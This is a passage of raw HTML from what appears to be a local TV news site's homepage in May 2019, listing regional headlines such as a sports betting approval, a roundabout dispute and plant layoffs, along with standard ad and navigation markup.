sizes="(max-width: 370px) 100vw, 370px" /></noscript></a> <h4 class="entry-title"><a href="https://wnep.com/2019/05/15/sports-betting-approved-at-mohegan-sun-pocono/" rel="bookmark">Sports Betting Approved at Mohegan Sun&nbsp;Pocono</a></h4> </li> <li class="story span4 span6-tablet has-video"> <div class="extra"><a href="https://wnep.com/category/news/" title="View all posts in News">News</a></div> <a class="story-image" href="https://wnep.com/2019/05/15/residents-pack-meeting-to-oppose-roundabout-for-route-118-in-lehman-township/"><img src="https://s0.wp.com/wp-content/themes/vip/plugins/lazy-load/images/1x1.trans.gif" data-lazy-src="https://localtvwnep.files.wordpress.com/2019/05/promo382242951.jpg?quality=85&#038;strip=all&#038;w=370&#038;h=204&#038;crop=1" width="370" height="204" class="attachment-grid-thumbnail size-grid-thumbnail wp-post-image" alt srcset="https://localtvwnep.files.wordpress.com/2019/05/promo382242951.jpg?quality=85&amp;strip=all&amp;w=370&amp;h=204&amp;crop=1 370w, https://localtvwnep.files.wordpress.com/2019/05/promo382242951.jpg?quality=85&amp;strip=all&amp;w=740&amp;h=408&amp;crop=1 740w, https://localtvwnep.files.wordpress.com/2019/05/promo382242951.jpg?quality=85&amp;strip=all&amp;w=150&amp;h=83&amp;crop=1 150w, https://localtvwnep.files.wordpress.com/2019/05/promo382242951.jpg?quality=85&amp;strip=all&amp;w=300&amp;h=165&amp;crop=1 300w" sizes="(max-width: 370px) 100vw, 370px"><noscript><img width="370" height="204" src="https://localtvwnep.files.wordpress.com/2019/05/promo382242951.jpg?quality=85&amp;strip=all&amp;w=370&amp;h=204&amp;crop=1" class="attachment-grid-thumbnail size-grid-thumbnail wp-post-image" alt="" srcset="https://localtvwnep.files.wordpress.com/2019/05/promo382242951.jpg?quality=85&amp;strip=all&amp;w=370&amp;h=204&amp;crop=1 370w, https://localtvwnep.files.wordpress.com/2019/05/promo382242951.jpg?quality=85&amp;strip=all&amp;w=740&amp;h=408&amp;crop=1 740w, https://localtvwnep.files.wordpress.com/2019/05/promo382242951.jpg?quality=85&amp;strip=all&amp;w=150&amp;h=83&amp;crop=1 150w, https://localtvwnep.files.wordpress.com/2019/05/promo382242951.jpg?quality=85&amp;strip=all&amp;w=300&amp;h=165&amp;crop=1 300w" sizes="(max-width: 370px) 100vw, 370px" /></noscript></a> <h4 class="entry-title"><a href="https://wnep.com/2019/05/15/residents-pack-meeting-to-oppose-roundabout-for-route-118-in-lehman-township/" rel="bookmark">Residents Pack Meeting to Oppose Roundabout for Route 118 in Lehman&nbsp;Township</a></h4> </li> <li class="story span4 span6-tablet has-video"> <div class="extra"><a href="https://wnep.com/category/news/" title="View all posts in News">News</a></div> <a class="story-image" href="https://wnep.com/2019/05/15/remembering-officer-kent/"><img src="https://s0.wp.com/wp-content/themes/vip/plugins/lazy-load/images/1x1.trans.gif" data-lazy-src="https://localtvwnep.files.wordpress.com/2019/05/scr-police-memorial.jpeg?quality=85&#038;strip=all&#038;w=370&#038;h=204&#038;crop=1" width="370" height="204" class="attachment-grid-thumbnail size-grid-thumbnail wp-post-image" alt srcset="https://localtvwnep.files.wordpress.com/2019/05/scr-police-memorial.jpeg?quality=85&amp;strip=all&amp;w=370&amp;h=204&amp;crop=1 370w, https://localtvwnep.files.wordpress.com/2019/05/scr-police-memorial.jpeg?quality=85&amp;strip=all&amp;w=740&amp;h=408&amp;crop=1 740w, https://localtvwnep.files.wordpress.com/2019/05/scr-police-memorial.jpeg?quality=85&amp;strip=all&amp;w=150&amp;h=83&amp;crop=1 150w, https://localtvwnep.files.wordpress.com/2019/05/scr-police-memorial.jpeg?quality=85&amp;strip=all&amp;w=300&amp;h=165&amp;crop=1 300w" sizes="(max-width: 370px) 100vw, 370px"><noscript><img width="370" height="204" src="https://localtvwnep.files.wordpress.com/2019/05/scr-police-memorial.jpeg?quality=85&amp;strip=all&amp;w=370&amp;h=204&amp;crop=1" class="attachment-grid-thumbnail size-grid-thumbnail wp-post-image" alt="" srcset="https://localtvwnep.files.wordpress.com/2019/05/scr-police-memorial.jpeg?quality=85&amp;strip=all&amp;w=370&amp;h=204&amp;crop=1 370w, https://localtvwnep.files.wordpress.com/2019/05/scr-police-memorial.jpeg?quality=85&amp;strip=all&amp;w=740&amp;h=408&amp;crop=1 740w, https://localtvwnep.files.wordpress.com/2019/05/scr-police-memorial.jpeg?quality=85&amp;strip=all&amp;w=150&amp;h=83&amp;crop=1 150w, https://localtvwnep.files.wordpress.com/2019/05/scr-police-memorial.jpeg?quality=85&amp;strip=all&amp;w=300&amp;h=165&amp;crop=1 300w" sizes="(max-width: 370px) 100vw, 370px" /></noscript></a> <h4 class="entry-title"><a href="https://wnep.com/2019/05/15/remembering-officer-kent/" rel="bookmark">Remembering Officer Kent</a></h4> </li> <li class="story span4 span6-tablet has-video"> <div class="extra"><a href="https://wnep.com/category/news/healthwatch-16/" title="View all posts in Healthwatch 16">Healthwatch 16</a> <a href="https://wnep.com/category/news/" title="View all posts in News">News</a></div> <a class="story-image" href="https://wnep.com/2019/05/15/heartfelt-reunion-of-first-responders-heart-attack-victim/"><img src="https://s0.wp.com/wp-content/themes/vip/plugins/lazy-load/images/1x1.trans.gif" data-lazy-src="https://localtvwnep.files.wordpress.com/2019/05/mont-reunion.jpeg?quality=85&#038;strip=all&#038;w=370&#038;h=204&#038;crop=1" width="370" height="204" class="attachment-grid-thumbnail size-grid-thumbnail wp-post-image" alt srcset="https://localtvwnep.files.wordpress.com/2019/05/mont-reunion.jpeg?quality=85&amp;strip=all&amp;w=370&amp;h=204&amp;crop=1 370w, https://localtvwnep.files.wordpress.com/2019/05/mont-reunion.jpeg?quality=85&amp;strip=all&amp;w=740&amp;h=408&amp;crop=1 740w, https://localtvwnep.files.wordpress.com/2019/05/mont-reunion.jpeg?quality=85&amp;strip=all&amp;w=150&amp;h=83&amp;crop=1 150w, https://localtvwnep.files.wordpress.com/2019/05/mont-reunion.jpeg?quality=85&amp;strip=all&amp;w=300&amp;h=165&amp;crop=1 300w" sizes="(max-width: 370px) 100vw, 370px"><noscript><img width="370" height="204" src="https://localtvwnep.files.wordpress.com/2019/05/mont-reunion.jpeg?quality=85&amp;strip=all&amp;w=370&amp;h=204&amp;crop=1" class="attachment-grid-thumbnail size-grid-thumbnail wp-post-image" alt="" srcset="https://localtvwnep.files.wordpress.com/2019/05/mont-reunion.jpeg?quality=85&amp;strip=all&amp;w=370&amp;h=204&amp;crop=1 370w, https://localtvwnep.files.wordpress.com/2019/05/mont-reunion.jpeg?quality=85&amp;strip=all&amp;w=740&amp;h=408&amp;crop=1 740w, https://localtvwnep.files.wordpress.com/2019/05/mont-reunion.jpeg?quality=85&amp;strip=all&amp;w=150&amp;h=83&amp;crop=1 150w, https://localtvwnep.files.wordpress.com/2019/05/mont-reunion.jpeg?quality=85&amp;strip=all&amp;w=300&amp;h=165&amp;crop=1 300w" sizes="(max-width: 370px) 100vw, 370px" /></noscript></a> <h4 class="entry-title"><a href="https://wnep.com/2019/05/15/heartfelt-reunion-of-first-responders-heart-attack-victim/" rel="bookmark">Heartfelt Reunion of First Responders, Heart Attack&nbsp;Victim</a></h4> </li> <li class="story span4 span6-tablet has-video"> <div class="extra"><a href="https://wnep.com/category/news/" title="View all posts in News">News</a></div> <a class="story-image" href="https://wnep.com/2019/05/15/a-night-of-broadway-celebration-in-northumbeland-county/"><img src="https://s0.wp.com/wp-content/themes/vip/plugins/lazy-load/images/1x1.trans.gif" data-lazy-src="https://localtvwnep.files.wordpress.com/2019/05/numb-theater.jpg?quality=85&#038;strip=all&#038;w=370&#038;h=204&#038;crop=1" width="370" height="204" class="attachment-grid-thumbnail size-grid-thumbnail wp-post-image" alt srcset="https://localtvwnep.files.wordpress.com/2019/05/numb-theater.jpg?quality=85&amp;strip=all&amp;w=370&amp;h=204&amp;crop=1 370w, https://localtvwnep.files.wordpress.com/2019/05/numb-theater.jpg?quality=85&amp;strip=all&amp;w=740&amp;h=408&amp;crop=1 740w, https://localtvwnep.files.wordpress.com/2019/05/numb-theater.jpg?quality=85&amp;strip=all&amp;w=150&amp;h=83&amp;crop=1 150w, https://localtvwnep.files.wordpress.com/2019/05/numb-theater.jpg?quality=85&amp;strip=all&amp;w=300&amp;h=165&amp;crop=1 300w" sizes="(max-width: 370px) 100vw, 370px"><noscript><img width="370" height="204" src="https://localtvwnep.files.wordpress.com/2019/05/numb-theater.jpg?quality=85&amp;strip=all&amp;w=370&amp;h=204&amp;crop=1" class="attachment-grid-thumbnail size-grid-thumbnail wp-post-image" alt="" srcset="https://localtvwnep.files.wordpress.com/2019/05/numb-theater.jpg?quality=85&amp;strip=all&amp;w=370&amp;h=204&amp;crop=1 370w, https://localtvwnep.files.wordpress.com/2019/05/numb-theater.jpg?quality=85&amp;strip=all&amp;w=740&amp;h=408&amp;crop=1 740w, https://localtvwnep.files.wordpress.com/2019/05/numb-theater.jpg?quality=85&amp;strip=all&amp;w=150&amp;h=83&amp;crop=1 150w, https://localtvwnep.files.wordpress.com/2019/05/numb-theater.jpg?quality=85&amp;strip=all&amp;w=300&amp;h=165&amp;crop=1 300w" sizes="(max-width: 370px) 100vw, 370px" /></noscript></a> <h4 class="entry-title"><a href="https://wnep.com/2019/05/15/a-night-of-broadway-celebration-in-northumbeland-county/" rel="bookmark">&#8216;A Night of Broadway&#8217; Celebration in Northumberland&nbsp;County</a></h4> </li> <li class="story span4 span6-tablet has-video"> <div class="extra"><a href="https://wnep.com/category/news/" title="View all posts in News">News</a></div> <a class="story-image" href="https://wnep.com/2019/05/15/catching-up-with-dick-knoebel/"><img src="https://s0.wp.com/wp-content/themes/vip/plugins/lazy-load/images/1x1.trans.gif" data-lazy-src="https://localtvwnep.files.wordpress.com/2019/05/dick_knoebel.jpg?quality=85&#038;strip=all&#038;w=370&#038;h=204&#038;crop=1" width="370" height="204" class="attachment-grid-thumbnail size-grid-thumbnail wp-post-image" alt srcset="https://localtvwnep.files.wordpress.com/2019/05/dick_knoebel.jpg?quality=85&amp;strip=all&amp;w=370&amp;h=204&amp;crop=1 370w, https://localtvwnep.files.wordpress.com/2019/05/dick_knoebel.jpg?quality=85&amp;strip=all&amp;w=740&amp;h=408&amp;crop=1 740w, https://localtvwnep.files.wordpress.com/2019/05/dick_knoebel.jpg?quality=85&amp;strip=all&amp;w=150&amp;h=83&amp;crop=1 150w, https://localtvwnep.files.wordpress.com/2019/05/dick_knoebel.jpg?quality=85&amp;strip=all&amp;w=300&amp;h=165&amp;crop=1 300w" sizes="(max-width: 370px) 100vw, 370px"><noscript><img width="370" height="204" src="https://localtvwnep.files.wordpress.com/2019/05/dick_knoebel.jpg?quality=85&amp;strip=all&amp;w=370&amp;h=204&amp;crop=1" class="attachment-grid-thumbnail size-grid-thumbnail wp-post-image" alt="" srcset="https://localtvwnep.files.wordpress.com/2019/05/dick_knoebel.jpg?quality=85&amp;strip=all&amp;w=370&amp;h=204&amp;crop=1 370w, https://localtvwnep.files.wordpress.com/2019/05/dick_knoebel.jpg?quality=85&amp;strip=all&amp;w=740&amp;h=408&amp;crop=1 740w, https://localtvwnep.files.wordpress.com/2019/05/dick_knoebel.jpg?quality=85&amp;strip=all&amp;w=150&amp;h=83&amp;crop=1 150w, https://localtvwnep.files.wordpress.com/2019/05/dick_knoebel.jpg?quality=85&amp;strip=all&amp;w=300&amp;h=165&amp;crop=1 300w" sizes="(max-width: 370px) 100vw, 370px" /></noscript></a> <h4 class="entry-title"><a href="https://wnep.com/2019/05/15/catching-up-with-dick-knoebel/" rel="bookmark">Catching Up with Dick&nbsp;Knoebel</a></h4> </li> </ul></div> </div> </div> <div class="span4 span12-tablet"> <div class="ad border-bottom"> <div id='taboola-right-rail-thumbnails'></div> <script type="text/javascript"> window._taboola = window._taboola || []; _taboola.push({"mode":"thumbnails-a-abp","container":"taboola-right-rail-thumbnails","placement":"Home Right Rail Thumbnails","target_type":"mix"}); </script> <div id='acm-tag-300x250-atf' class='prebid ad-wrapper' style='width:300px; min-height: 250px;'><script> googletag.cmd.push(function() { googletag.display('acm-tag-300x250-atf'); });</script></div> </div> <div class="hidden-phone hidden-tablet"> <div class="popular"> <h5 class="block-title">Popular</h5> <ul class="story-list with-thumbs"> <li class="story has-video"> <a class="story-image" href="https://wnep.com/2019/05/15/three-high-school-administrators-suspended-after-school-prank/"><img src="https://s0.wp.com/wp-content/themes/vip/plugins/lazy-load/images/1x1.trans.gif" data-lazy-src="https://localtvwnep.files.wordpress.com/2019/05/promo382245674.jpg?quality=85&#038;strip=all&#038;w=109&#038;h=60&#038;crop=1" width="109" height="60" class="attachment-tiny-thumbnail size-tiny-thumbnail wp-post-image" alt srcset="https://localtvwnep.files.wordpress.com/2019/05/promo382245674.jpg?quality=85&amp;strip=all&amp;w=109&amp;h=60&amp;crop=1 109w, https://localtvwnep.files.wordpress.com/2019/05/promo382245674.jpg?quality=85&amp;strip=all&amp;w=218&amp;h=120&amp;crop=1 218w, https://localtvwnep.files.wordpress.com/2019/05/promo382245674.jpg?quality=85&amp;strip=all&amp;w=150&amp;h=83&amp;crop=1 150w" sizes="(max-width: 109px) 100vw, 109px"><noscript><img width="109" height="60" src="https://localtvwnep.files.wordpress.com/2019/05/promo382245674.jpg?quality=85&amp;strip=all&amp;w=109&amp;h=60&amp;crop=1" class="attachment-tiny-thumbnail size-tiny-thumbnail wp-post-image" alt="" srcset="https://localtvwnep.files.wordpress.com/2019/05/promo382245674.jpg?quality=85&amp;strip=all&amp;w=109&amp;h=60&amp;crop=1 109w, https://localtvwnep.files.wordpress.com/2019/05/promo382245674.jpg?quality=85&amp;strip=all&amp;w=218&amp;h=120&amp;crop=1 218w, https://localtvwnep.files.wordpress.com/2019/05/promo382245674.jpg?quality=85&amp;strip=all&amp;w=150&amp;h=83&amp;crop=1 150w" sizes="(max-width: 109px) 100vw, 109px" /></noscript></a> <strong class="entry-title"><a href="https://wnep.com/2019/05/15/three-high-school-administrators-suspended-after-school-prank/" rel="bookmark">Three High School Administrators Suspended After School&nbsp;Prank</a></strong> </li> <li class="story has-video"> <a class="story-image" href="https://wnep.com/2019/05/15/one-person-dies-at-hazleton-plant/"><img src="https://s0.wp.com/wp-content/themes/vip/plugins/lazy-load/images/1x1.trans.gif" data-lazy-src="https://localtvwnep.files.wordpress.com/2019/05/haz-industrial.jpg?quality=85&#038;strip=all&#038;w=109&#038;h=60&#038;crop=1" width="109" height="60" class="attachment-tiny-thumbnail size-tiny-thumbnail wp-post-image" alt srcset="https://localtvwnep.files.wordpress.com/2019/05/haz-industrial.jpg?quality=85&amp;strip=all&amp;w=109&amp;h=60&amp;crop=1 109w, https://localtvwnep.files.wordpress.com/2019/05/haz-industrial.jpg?quality=85&amp;strip=all&amp;w=218&amp;h=120&amp;crop=1 218w, https://localtvwnep.files.wordpress.com/2019/05/haz-industrial.jpg?quality=85&amp;strip=all&amp;w=150&amp;h=83&amp;crop=1 150w" sizes="(max-width: 109px) 100vw, 109px"><noscript><img width="109" height="60" src="https://localtvwnep.files.wordpress.com/2019/05/haz-industrial.jpg?quality=85&amp;strip=all&amp;w=109&amp;h=60&amp;crop=1" class="attachment-tiny-thumbnail size-tiny-thumbnail wp-post-image" alt="" srcset="https://localtvwnep.files.wordpress.com/2019/05/haz-industrial.jpg?quality=85&amp;strip=all&amp;w=109&amp;h=60&amp;crop=1 109w, https://localtvwnep.files.wordpress.com/2019/05/haz-industrial.jpg?quality=85&amp;strip=all&amp;w=218&amp;h=120&amp;crop=1 218w, https://localtvwnep.files.wordpress.com/2019/05/haz-industrial.jpg?quality=85&amp;strip=all&amp;w=150&amp;h=83&amp;crop=1 150w" sizes="(max-width: 109px) 100vw, 109px" /></noscript></a> <strong class="entry-title"><a href="https://wnep.com/2019/05/15/one-person-dies-at-hazleton-plant/" rel="bookmark">One Person Dies at Hazleton&nbsp;Plant</a></strong> </li> <li class="story has-video"> <a class="story-image" href="https://wnep.com/2019/05/15/woman-accused-of-trying-to-cover-up-deadly-shooting/"><img src="https://s0.wp.com/wp-content/themes/vip/plugins/lazy-load/images/1x1.trans.gif" data-lazy-src="https://localtvwnep.files.wordpress.com/2019/05/promo382181769.jpg?quality=85&#038;strip=all&#038;w=109&#038;h=60&#038;crop=1" width="109" height="60" class="attachment-tiny-thumbnail size-tiny-thumbnail wp-post-image" alt srcset="https://localtvwnep.files.wordpress.com/2019/05/promo382181769.jpg?quality=85&amp;strip=all&amp;w=109&amp;h=60&amp;crop=1 109w, https://localtvwnep.files.wordpress.com/2019/05/promo382181769.jpg?quality=85&amp;strip=all&amp;w=218&amp;h=120&amp;crop=1 218w, https://localtvwnep.files.wordpress.com/2019/05/promo382181769.jpg?quality=85&amp;strip=all&amp;w=150&amp;h=83&amp;crop=1 150w" sizes="(max-width: 109px) 100vw, 109px"><noscript><img width="109" height="60" src="https://localtvwnep.files.wordpress.com/2019/05/promo382181769.jpg?quality=85&amp;strip=all&amp;w=109&amp;h=60&amp;crop=1" class="attachment-tiny-thumbnail size-tiny-thumbnail wp-post-image" alt="" srcset="https://localtvwnep.files.wordpress.com/2019/05/promo382181769.jpg?quality=85&amp;strip=all&amp;w=109&amp;h=60&amp;crop=1 109w, https://localtvwnep.files.wordpress.com/2019/05/promo382181769.jpg?quality=85&amp;strip=all&amp;w=218&amp;h=120&amp;crop=1 218w, https://localtvwnep.files.wordpress.com/2019/05/promo382181769.jpg?quality=85&amp;strip=all&amp;w=150&amp;h=83&amp;crop=1 150w" sizes="(max-width: 109px) 100vw, 109px" /></noscript></a> <strong class="entry-title"><a href="https://wnep.com/2019/05/15/woman-accused-of-trying-to-cover-up-deadly-shooting/" rel="bookmark">Woman Accused of Trying to Cover Up Deadly&nbsp;Shooting</a></strong> </li> <li class="story has-video"> <a class="story-image" href="https://wnep.com/2019/05/13/wood-mode-closing-laying-off-workers/"><img src="https://s0.wp.com/wp-content/themes/vip/plugins/lazy-load/images/1x1.trans.gif" data-lazy-src="https://localtvwnep.files.wordpress.com/2019/05/wood-mode.jpg?quality=85&#038;strip=all&#038;w=109&#038;h=60&#038;crop=1" width="109" height="60" class="attachment-tiny-thumbnail size-tiny-thumbnail wp-post-image" alt srcset="https://localtvwnep.files.wordpress.com/2019/05/wood-mode.jpg?quality=85&amp;strip=all&amp;w=109&amp;h=60&amp;crop=1 109w, https://localtvwnep.files.wordpress.com/2019/05/wood-mode.jpg?quality=85&amp;strip=all&amp;w=218&amp;h=120&amp;crop=1 218w, https://localtvwnep.files.wordpress.com/2019/05/wood-mode.jpg?quality=85&amp;strip=all&amp;w=150&amp;h=83&amp;crop=1 150w" sizes="(max-width: 109px) 100vw, 109px"><noscript><img width="109" height="60" src="https://localtvwnep.files.wordpress.com/2019/05/wood-mode.jpg?quality=85&amp;strip=all&amp;w=109&amp;h=60&amp;crop=1" class="attachment-tiny-thumbnail size-tiny-thumbnail wp-post-image" alt="" srcset="https://localtvwnep.files.wordpress.com/2019/05/wood-mode.jpg?quality=85&amp;strip=all&amp;w=109&amp;h=60&amp;crop=1 109w, https://localtvwnep.files.wordpress.com/2019/05/wood-mode.jpg?quality=85&amp;strip=all&amp;w=218&amp;h=120&amp;crop=1 218w, https://localtvwnep.files.wordpress.com/2019/05/wood-mode.jpg?quality=85&amp;strip=all&amp;w=150&amp;h=83&amp;crop=1 150w" sizes="(max-width: 109px) 100vw, 109px" /></noscript></a> <strong class="entry-title"><a href="https://wnep.com/2019/05/13/wood-mode-closing-laying-off-workers/" rel="bookmark">Wood-Mode Closing, Laying Off&nbsp;Workers</a></strong> </li> </ul> </div> <div id='taboola-right-rail-thumbnails-3rd'></div> <script type="text/javascript"> window._taboola = window._taboola || []; _taboola.push({"mode":"thumbnails-b-abp","container":"taboola-right-rail-thumbnails-3rd","placement":"Right Rail Thumbnails 3rd","target_type":"mix"}); </script> <div class="ad border-bottom pad-top"> <div id='acm-tag-300x250-mid' class='prebid ad-wrapper' style='width:300px; min-height: 250px;'><script> googletag.cmd.push(function() { googletag.display('acm-tag-300x250-mid'); });</script></div> </div> <div class="ad pad-top"> <div id='acm-tag-300x250-btf' class='prebid ad-wrapper' style='width:300px; min-height: 250px;'><script> googletag.cmd.push(function() { googletag.display('acm-tag-300x250-btf'); });</script></div> </div> </div> </div> </div> </div> </div> <div id="quick-links" class="gray-links full-width"><ul id="menu-quick-links" class="nav nav-pills"><li class="nav-header">Quick links</li><li id="menu-item-166924" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-166924"><a href="https://wnep.com/contact/">Contact</a></li> <li id="menu-item-74069" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-74069"><a href="https://wnep.com/contact/submit-newstips/">Story Ideas</a></li> <li id="menu-item-62905" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-62905"><a href="https://wnep.com/psbb">PSBB (Community Events)</a></li> <li id="menu-item-32466" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-32466"><a href="https://wnep.com/category/websites-mentioned/">Websites Mentioned</a></li> <li id="menu-item-238222" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-238222"><a href="https://wnep.com/weather/river-levels/">River Levels</a></li> <li id="menu-item-28631" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-28631"><a href="https://wnep.com/traffic/">Traffic Tracker</a></li> <li id="menu-item-141319" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-141319"><a href="https://wnep.com/weather/flight-tracker/">Flight Tracker</a></li> <li id="menu-item-183645" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-183645"><a href="https://wnep.com/wnep-gas-tracker/">Gas Tracker</a></li> <li id="menu-item-46849" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-46849"><a href="http://local.wnep.com/classifieds/">Classifieds</a></li> </ul></div> <div id="home-viral" class="full-width stories-inverse"> <div class="container"> <h5 class="block-title">Featured </h5> <div id="carousel-viral" class="carousel slide"> <div class="viral-grid row-fluid"> <ul class="story-grid thumbnails carousel-inner"> <li class="story span3"> <a class="story-image" href="https://wnep.com/2015/11/02/wnep-apps/"><img src="https://s0.wp.com/wp-content/themes/vip/plugins/lazy-load/images/1x1.trans.gif" data-lazy-src="https://localtvwnep.files.wordpress.com/2013/02/mobile_app_center_icon.jpg?quality=85&#038;strip=all&#038;w=400&#038;h=225&#038;crop=1" width="400" height="225" class="attachment-post-thumbnail size-post-thumbnail wp-post-image" alt srcset="https://localtvwnep.files.wordpress.com/2013/02/mobile_app_center_icon.jpg?quality=85&amp;strip=all&amp;w=400&amp;h=225&amp;crop=1 400w, https://localtvwnep.files.wordpress.com/2013/02/mobile_app_center_icon.jpg?quality=85&amp;strip=all&amp;w=800&amp;h=450&amp;crop=1 800w, https://localtvwnep.files.wordpress.com/2013/02/mobile_app_center_icon.jpg?quality=85&amp;strip=all&amp;w=150&amp;h=84&amp;crop=1 150w, https://localtvwnep.files.wordpress.com/2013/02/mobile_app_center_icon.jpg?quality=85&amp;strip=all&amp;w=300&amp;h=169&amp;crop=1 300w, https://localtvwnep.files.wordpress.com/2013/02/mobile_app_center_icon.jpg?quality=85&amp;strip=all&amp;w=768&amp;h=432&amp;crop=1 768w" sizes="(max-width: 400px) 100vw, 400px"><noscript><img width="400" height="225" src="https://localtvwnep.files.wordpress.com/2013/02/mobile_app_center_icon.jpg?quality=85&amp;strip=all&amp;w=400&amp;h=225&amp;crop=1" class="attachment-post-thumbnail size-post-thumbnail wp-post-image" alt="" srcset="https://localtvwnep.files.wordpress.com/2013/02/mobile_app_center_icon.jpg?quality=85&amp;strip=all&amp;w=400&amp;h=225&amp;crop=1 400w, https://localtvwnep.files.wordpress.com/2013/02/mobile_app_center_icon.jpg?quality=85&amp;strip=all&amp;w=800&amp;h=450&amp;crop=1 800w, https://localtvwnep.files.wordpress.com/2013/02/mobile_app_center_icon.jpg?quality=85&amp;strip=all&amp;w=150&amp;h=84&amp;crop=1 150w, https://localtvwnep.files.wordpress.com/2013/02/mobile_app_center_icon.jpg?quality=85&amp;strip=all&amp;w=300&amp;h=169&amp;crop=1 300w, https://localtvwnep.files.wordpress.com/2013/02/mobile_app_center_icon.jpg?quality=85&amp;strip=all&amp;w=768&amp;h=432&amp;crop=1 768w" sizes="(max-width: 400px) 100vw, 400px" /></noscript></a> <strong class="entry-title"><a href="https://wnep.com/2015/11/02/wnep-apps/" rel="bookmark">WNEP Apps</a></strong> </li> <li class="story span3"> <a class="story-image" href="https://wnep.com/2019/05/03/yards-brewing-crush-the-summer-sweepstakes/"><img src="https://s0.wp.com/wp-content/themes/vip/plugins/lazy-load/images/1x1.trans.gif" data-lazy-src="https://localtvwnep.files.wordpress.com/2019/04/yards-contest-2019.png?w=400&#038;h=225&#038;crop=1" width="400" height="225" class="attachment-post-thumbnail size-post-thumbnail wp-post-image" alt srcset="https://localtvwnep.files.wordpress.com/2019/04/yards-contest-2019.png?w=400&amp;h=225&amp;crop=1 400w, https://localtvwnep.files.wordpress.com/2019/04/yards-contest-2019.png?w=800&amp;h=450&amp;crop=1 800w, https://localtvwnep.files.wordpress.com/2019/04/yards-contest-2019.png?w=150&amp;h=84&amp;crop=1 150w, https://localtvwnep.files.wordpress.com/2019/04/yards-contest-2019.png?w=300&amp;h=169&amp;crop=1 300w, https://localtvwnep.files.wordpress.com/2019/04/yards-contest-2019.png?w=768&amp;h=432&amp;crop=1 768w" sizes="(max-width: 400px) 100vw, 400px"><noscript><img width="400" height="225" src="https://localtvwnep.files.wordpress.com/2019/04/yards-contest-2019.png?w=400&amp;h=225&amp;crop=1" class="attachment-post-thumbnail size-post-thumbnail wp-post-image" alt="" srcset="https://localtvwnep.files.wordpress.com/2019/04/yards-contest-2019.png?w=400&amp;h=225&amp;crop=1 400w, https://localtvwnep.files.wordpress.com/2019/04/yards-contest-2019.png?w=800&amp;h=450&amp;crop=1 800w, https://localtvwnep.files.wordpress.com/2019/04/yards-contest-2019.png?w=150&amp;h=84&amp;crop=1 150w, https://localtvwnep.files.wordpress.com/2019/04/yards-contest-2019.png?w=300&amp;h=169&amp;crop=1 300w, https://localtvwnep.files.wordpress.com/2019/04/yards-contest-2019.png?w=768&amp;h=432&amp;crop=1 768w" sizes="(max-width: 400px) 100vw, 400px" /></noscript></a> <strong class="entry-title"><a href="https://wnep.com/2019/05/03/yards-brewing-crush-the-summer-sweepstakes/" rel="bookmark">Yards Brewing &#8216;Crush the Summer&#8217;&nbsp;Sweepstakes</a></strong> </li> <li class="story span3"> <a class="story-image" href="https://wnep.com/2019/05/13/mr-curiosity-podcast-wilks-webster-one-does-not-come-late/"><img src="https://s0.wp.com/wp-content/themes/vip/plugins/lazy-load/images/1x1.trans.gif" data-lazy-src="https://localtvwnep.files.wordpress.com/2019/05/webster_mrc_ep5_featured-e1557507193206.jpg?quality=85&#038;strip=all&#038;w=400&#038;h=225&#038;crop=1" width="400" height="225" class="attachment-post-thumbnail size-post-thumbnail wp-post-image" alt srcset="https://localtvwnep.files.wordpress.com/2019/05/webster_mrc_ep5_featured-e1557507193206.jpg?quality=85&amp;strip=all&amp;w=400&amp;h=225&amp;crop=1 400w, https://localtvwnep.files.wordpress.com/2019/05/webster_mrc_ep5_featured-e1557507193206.jpg?quality=85&amp;strip=all&amp;w=800&amp;h=450&amp;crop=1 800w, https://localtvwnep.files.wordpress.com/2019/05/webster_mrc_ep5_featured-e1557507193206.jpg?quality=85&amp;strip=all&amp;w=150&amp;h=84&amp;crop=1 150w, https://localtvwnep.files.wordpress.com/2019/05/webster_mrc_ep5_featured-e1557507193206.jpg?quality=85&amp;strip=all&amp;w=300&amp;h=169&amp;crop=1 300w, https://localtvwnep.files.wordpress.com/2019/05/webster_mrc_ep5_featured-e1557507193206.jpg?quality=85&amp;strip=all&amp;w=768&amp;h=432&amp;crop=1 768w" sizes="(max-width: 400px) 100vw, 400px"><noscript><img width="400" height="225" src="https://localtvwnep.files.wordpress.com/2019/05/webster_mrc_ep5_featured-e1557507193206.jpg?quality=85&amp;strip=all&amp;w=400&amp;h=225&amp;crop=1" class="attachment-post-thumbnail size-post-thumbnail wp-post-image" alt="" srcset="https://localtvwnep.files.wordpress.com/2019/05/webster_mrc_ep5_featured-e1557507193206.jpg?quality=85&amp;strip=all&amp;w=400&amp;h=225&amp;crop=1 400w, https://localtvwnep.files.wordpress.com/2019/05/webster_mrc_ep5_featured-e1557507193206.jpg?quality=85&amp;strip=all&amp;w=800&amp;h=450&amp;crop=1 800w, https://localtvwnep.files.wordpress.com/2019/05/webster_mrc_ep5_featured-e1557507193206.jpg?quality=85&amp;strip=all&amp;w=150&amp;h=84&amp;crop=1 150w, https://localtvwnep.files.wordpress.com/2019/05/webster_mrc_ep5_featured-e1557507193206.jpg?quality=85&amp;strip=all&amp;w=300&amp;h=169&amp;crop=1 300w, https://localtvwnep.files.wordpress.com/2019/05/webster_mrc_ep5_featured-e1557507193206.jpg?quality=85&amp;strip=all&amp;w=768&amp;h=432&amp;crop=1 768w" sizes="(max-width: 400px) 100vw, 400px" /></noscript></a> <strong class="entry-title"><a href="https://wnep.com/2019/05/13/mr-curiosity-podcast-wilks-webster-one-does-not-come-late/" rel="bookmark">Mr. Curiosity Podcast: WILK&#8217;s Webster &#8211; &#8216;One does not come late&#8230;&#8217;</a></strong> </li> <li class="story span3"> <a class="story-image" href="https://wnep.com/2019/05/01/pet-slideshow-may-2019/"><img src="https://s0.wp.com/wp-content/themes/vip/plugins/lazy-load/images/1x1.trans.gif" data-lazy-src="https://localtvwnep.files.wordpress.com/2019/04/img_8955.jpg?quality=85&#038;strip=all&#038;w=400&#038;h=225&#038;crop=1" width="400" height="225" class="attachment-post-thumbnail size-post-thumbnail wp-post-image" alt srcset="https://localtvwnep.files.wordpress.com/2019/04/img_8955.jpg?quality=85&amp;strip=all&amp;w=400&amp;h=225&amp;crop=1 400w, 